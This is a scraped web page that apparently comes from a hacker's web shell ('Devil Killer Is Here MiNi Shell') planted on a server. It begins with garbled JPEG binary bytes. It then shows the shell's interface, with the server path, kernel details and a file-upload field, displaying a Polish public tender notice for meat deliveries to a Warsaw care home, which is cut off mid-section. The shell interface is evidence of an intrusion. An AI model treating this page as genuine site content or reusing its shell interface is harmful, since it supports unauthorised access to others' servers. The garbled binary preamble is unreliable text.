JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241128/0062221501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa mięsa wołowego, wieprzowego, drobiowego <br/>oraz wędlin wieprzowych i drobiowych I, II, III gatunku dla Domu Pomocy Społecznej „Pod Brzozami” w Warszawie przy ul. Bohaterów 46/48 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej &#34;Pod Brzozami&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 006377131</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohaterów 46/48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-007</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.dpspodbrzozami@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.dpspodbrzozami.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa mięsa wołowego, wieprzowego, drobiowego <br/>oraz wędlin wieprzowych i drobiowych I, II, III gatunku dla Domu Pomocy Społecznej „Pod Brzozami” w Warszawie przy ul. Bohaterów 46/48 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-76c73d11-3ff0-472a-955e-73445e553cf4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00622215</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00069471/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa mięsa wołowego, wieprzowego, drobiowego oraz wędlin wieprzowych i drobiowych I,II,III gatunku dla Domu Pomocy Społecznej &#34;Pod Brzozami&#34; w Warszawie przy ul. Bohaterów 46/48.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-76c73d11-3ff0-472a-955e-73445e553cf4 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja pomiędzy zamawiającym a wykonawcami (składanie oświadczeń, dokumentów, zawiadomień oraz przekazywanie informacji odbywa <br/>się elektronicznie za pośrednictwem platformy: https://ezamowienia.gov.pl/, ePUAPu, https://epuap.gov.pl/wps/portal.<br/>2.	We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający <br/>i wykonawcy posługują się numerem ogłoszenia w BZP lub Identyfikatorem Postępowania. <br/>3.	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów <br/>lub oświadczeń składane są przez wykonawcę za pośrednictwem Formularza <br/>do komunikacji jako załączniki. <br/>4.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi <br/>w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy <br/>i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zamawiający informuję, że dane osobowe pozyskane w związku z przeprowadzeniem niniejszego postępowania przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia <br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016 r., str. 1), dalej &#34;Rozporządzenie RODO&#34; w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>2.	Administratorem danych osobowych jest zamawiający. Podstawą prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych wydane <br/>na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym <br/>i archiwach. W sprawach związanych z Pani/Pana danymi proszę kontaktować <br/>się z Inspektorem Ochrony Danych, kontakt pisemny za pomocą poczty tradycyjnej <br/>na adres: IOD Dom pomocy Społecznej „Pod Brzozami”, 03-007 Warszawa, ul. Bohaterów 46/48; e-mail: iod@dpspodbrzozami.pl.<br/>3.	Dane osobowe będą przetwarzane, z uwzględnieniem przepisów prawa, w celu: <br/>1)	przeprowadzenie postępowania o udzielenie zamówienia publicznego;<br/>2)	zawarcia i realizacji umowy z wyłonionym w niniejszym postępowaniu Wykonawcą;<br/>3)	dokonania rozliczenia i płatności związanych z realizacją umowy;<br/>4)	przeprowadzenie ewentualnych postępowań kontrolnych i/lub audytu przez komórki zamawiającego i inne uprawnione podmioty;<br/>5)	udostępnienie dokumentacji postępowania i zawartej umowy jako informacji publicznej;<br/>6)	archiwizacji postępowania.<br/>4.	Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym.<br/>5.	Dane osobowe będą przechowywane przez okres obowiązywania umowy a następnie przez okres co najmniej 5 lat zgodnie z przepisami dotyczącymi archiwizacji. Dotyczy <br/>to wszystkich uczestników postępowania.<br/>6.	Osobie, której dane dotyczą przysługuje na warunkach określonych w przepisach Rozporządzenia RODO: <br/>a)	prawo dostępu do danych (art. 15),<br/>b)	prawo sprostowania danych (art. 16),<br/>c)	prawo do usunięcia danych (art. 17),<br/>d)	prawo do ograniczenia przetwarzania danych (art. 18),<br/>e)	prawo wniesienia skargi do organu nadzorczego.<br/>7.	Osobie, której dane dotyczą nie przysługuje:<br/>a)	prawo do usunięcia danych osobowych, &#34;prawo do bycia zapomnianym&#34; w związku <br/>z art. 17 ust. 3 lit. b, d lub e Rozporządzenia RODO,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia RODO<br/>c)	prawo sprzeciwu, o którym mowa w art. 21 Rozporządzenia RODO.<br/>8.	Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu <br/>oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.<br/>9.	Wystąpienie z żądaniem o którym mowa w pkt. 6 lub 7, nie ogranicza przetwarzania danych osobowych do czasu zakończenia niniejszego postępowania. Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania <br/>lub umowy.<br/>10.	Wykonawca pozyskując dane osobowe na potrzeby sporządzenia oferty zobowiązany <br/>jest wypełnić obowiązki wynikające m. in. z art 13 i 14 Rozporządzenia RODO. Wykonawca składając ofertę składa oświadczenie dotyczące przetwarzania danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP/DPS/2/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zamówienie publiczne dotyczy: <br/>Sukcesywne dostawy mięsa wołowego, wieprzowego, drobiowego oraz wędlin wieprzowych i drobiowych I, II i III gatunku dla Domu Pomocy Społecznej ,,Pod Brzozami” w Warszawie przy<br/> ul Bohaterów 46/48 zwanym dalej także jako „Zamawiający” lub „Odbiorca”. <br/><br/>2.	Szczegółowy zakres przedmiotu zamówienia przedstawiono w załączniku do niniejszego opisu przedmiotu zamówienia w odrębnym arkuszu. Wykonawca może złożyć tylko jedną ofertę. <br/>3.	Zamawiający określił przewidywane, szacunkowe zapotrzebowanie na produkty/towar w okresie wykonywania zamówienia, które nie są wiążące dla Zamawiającego, a stanowią jedynie podstawę dla Wykonawców do sporządzenia oferty. Wykonawcy nie będą przysługiwały żadne roszczenia odszkodowawcze w stosunku do niewykorzystanej ilości przedmiotu zamówienia. Zamawiający zapewnia realizację zamówienia do 70% maksymalnego wynagrodzenia brutto, o którym mowa w § 8ust. 1 projektu umowy. <br/>4.	Zamawiający przewiduje możliwość zmiany produktu/towaru wskazanego w ofercie Wykonawcy na produkt/towar o takiej samej lub wyższej jakości w przypadku, gdy na skutek okoliczności nie leżących po stronie Wykonawcy oferowany produkt/towar nie będzie dostępny na ogólnodostępnym rynku w chwili realizacji przedmiotu zamówienia, czego nie można było przewidzieć na etapie realizacji zamówienia, przy zachowaniu należytej staranności.<br/>5.	Produkty/towary będą pochodziły z bieżącej produkcji, będą wytwarzane zgodnie z zasadami GMP (Dobrej Praktyki Produkcyjnej), muszą być dopuszczone do obrotu i sprzedaży zgodnie z obowiązującymi przepisami w szczególności: <br/>a) Ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2023 r. poz. 1448), <br/>b) Ustawą z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (Dz. U. 2023 r. poz. 1980) wraz z aktami wykonawczymi.<br/>6. Produkty/towary stanowiące przedmiot zamówienia winny być wolne od wad jakościowych z terminem przydatności do spożycia nie krótszym niż 1/3 okresu określonego przez producenta. <br/>9.	Wykonawca gwarantuje jakość produktów/towarów zgodną z normami oraz zobowiązuje się do udzielenia gwarancji jakościowej na dostarczane artykuły. <br/>10.	Produkty/towary dostarczone będą środkiem transportowym spełniającym wymagania obowiązujących w tym zakresie przepisów prawa. <br/>11.	Termin realizacji pojedynczej dostawy nastąpi zgodnie z przesłanym przez Zamawiającego zamówieniem z wykazem produktów/towaru wraz z terminem i godziną dostawy drogą elektroniczną na adres e – mail Wykonawcy, z wyprzedzeniem minimum jednodniowym, do godziny 12.00. <br/>12.	Dostawa przedmiotu zamówienia następować będzie do siedziby Odbiorcy, transportem Wykonawcy na jego koszt i ryzyko, w terminach wynikających z zamówienia przy czym dostawa nastąpi w godzinach 7.00-12.00. we wtorki i czwartki dwa razy w tygodniu.<br/>13.	Rodzaj i ilość produktów/towarów stanowiących przedmiot każdorazowej dostawy określona będzie w zamówieniach przekazanych Wykonawcy drogą telefoniczną oraz mailem, określających wielkość i rodzaj dostawy stosownie do potrzeb Zamawiającego. <br/>14.	Dokumentem potwierdzającym dokonanie dostawy jest każdorazowo protokół odbioru. Jako termin realizacji pojedynczej dostawy rozumie się datę złożenia podpisu na protokole odbioru dostawy przez osobę dokonującą odbioru. <br/>15.	Wykonawca zobowiązany będzie do przekazania Odbiorcy do 7 – go dnia każdego miesiąca raportu, w którym będzie wyszczególniona nazwa Odbiorcy, nazwy produktów/towarów, wartość dostawy za dany miesiąc oraz wartość narastająca. Za miesiąc grudzień raport zostanie przekazany do dnia 28 tego miesiąca, uwzględniając szacunkową wartość dostaw, które zostaną wykonane do końca miesiąca. Raport przekazany będzie w formie ustalonej z Odbiorcą. <br/>16.	Zamawiający informuje, iż u Odbiorcy obowiązuje system HACCP, w związku z tym należy przedstawić w momencie rozpoczęcia dostaw i na żądanie SANEPID-u n/w dokumenty: <br/>a)	decyzję Państwowego Powiatowego Inspektoratu Sanitarnego dla środka transportu zezwalająca na przewóz produktów spożywczych; <br/>b)	aktualne orzeczenie lekarskie z badania do celów sanitarno - epidemiologicznych osoby dostarczającej towar. <br/>20.	Zamawiane produkty/towary powinny być dostarczane w opakowaniach (skrzynki, pojemniki itp.). Opakowanie powinno być dostosowane do właściwości danego produktu/towaru i odpowiednie z punktu widzenia higieny i bezpieczeństwa zdrowotnego żywności, zgodnie z obowiązującymi przepisami. Środki transportu powinny być czyste i bez obcych zapachów. Niedopuszczalne jest stosowanie opakowań zastępczych do produktów spożywczych. Opakowania jednostkowe oraz transportowe muszą być czytelnie oznakowane zgodnie z obowiązującymi przepisami dotyczącymi znakowania żywności, na opakowaniach jednostkowych muszą być umieszczone czytelne napisy, w języku polskim. <br/>21.	Wykonawca zobowiązuje się do umożliwienia Odbiorcy kontroli środka transportu <br/>i pojemników (opakowań) do przewozu produktów/towarów pod kątem czystości. <br/>22.	Odbioru jakościowego produktów/towaru dokonuje Odbiorca w chwili ich dostawy. <br/>23.	W przypadku niezgodności dostarczanych produktów/towaru z wymogami jakościowymi, ilościowymi, sanitarnymi oraz opisem zawartym w Umowie, Zamawiający odmówi odbioru tych produktów oraz sporządzi protokół reklamacyjny. <br/>24.	W przypadku, gdy przy odbiorze dostawy stwierdzone zostaną braki ilościowe lub wady jakościowe dostarczonego przedmiotu zamówienia, Odbiorca jest uprawniony do zwrotu całej partii niezgodnego asortymentu na koszt i ryzyko Wykonawcy. Wykonawca dokona wymiany lub ich uzupełnienia na produkty/towary wolne od wad na swój koszt w terminie zaoferowanym w ofercie, jednakże nie dłuższym niż 3 godzin od momentu zgłoszenia reklamacji. Wszystkie koszty związane z ponownym dostarczeniem towaru ponosi Wykonawca. <br/>25.	Odbiorca zastrzega sobie prawo złożenia reklamacji w sytuacji wykonania przez Wykonawcę dostawy niezgodnie z postanowieniami umowy. <br/>26.	Wykonawca poda imię i nazwisko osoby oraz określi numery telefonów kontaktowych <br/>i adresy e-mail niezbędne dla sprawnego i terminowego wykonania zamówienia. <br/>27.	Na każde żądanie Wykonawca zobowiązany jest to przedstawienie informacji dotyczącej pochodzenia produktu/towaru. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15131100-6 - Produkty mięsno-wędliniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15113000-3 - Wieprzowina</p> <p class="mb-0">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</p> <p class="mb-0">15112000-6 - Drób</p> <p class="mb-0">15131135-0 - Wędliny drobiowe</p> <p class="mb-0">15131410-2 - Szynka</p> <p class="mb-0">15131210-0 - Szynka wędzona</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	nie podlegają wykluczeniu,<br/>b)	spełniają warunki udziału w postępowaniu, określone w ogłoszeniu o zamówieniu <br/>oraz niniejszej specyfikacji warunków zamówienia,<br/>c)	posiadają zdolności do występowania w obrocie gospodarczym.<br/>2.	Warunki udziału w postępowaniu dotyczą:<br/>a)	zdolności do występowania w obrocie gospodarczym,<br/>b)	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,<br/>c) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>d)	sytuacji ekonomicznej lub finansowej,<br/>e)	zdolności technicznej lub zawodowej.<br/>3.	Postanowienia dotyczące Podmiotów udostępniających zasoby:<br/>a)	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w stosownych sytuacjach oraz w odniesieniu do niniejszego zamówienia polegać <br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych (Podmioty udostępniające zasoby),<br/>b)	w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/>lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, <br/>do realizacji których te zdolności są wymagane,<br/>c) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>d) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>e) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>4.	Określone przez Zamawiającego warunki udziału w postępowaniu oraz wymagane środki dowodowe mają na celu ocenę zdolności Wykonawcy do należytego wykonania niniejszego zamówienia. Wykonawcy, którzy nie wykażą spełnienia warunków udziału <br/>w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są oni wykazać spełnienie warunków udziału w postępowaniu wspólnie.<br/>6. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, <br/>może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.<br/>7.	Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	informację z Krajowego Rejestru Karnego w zakresie:<br/>a)	art. 108, ust. 1 pkt 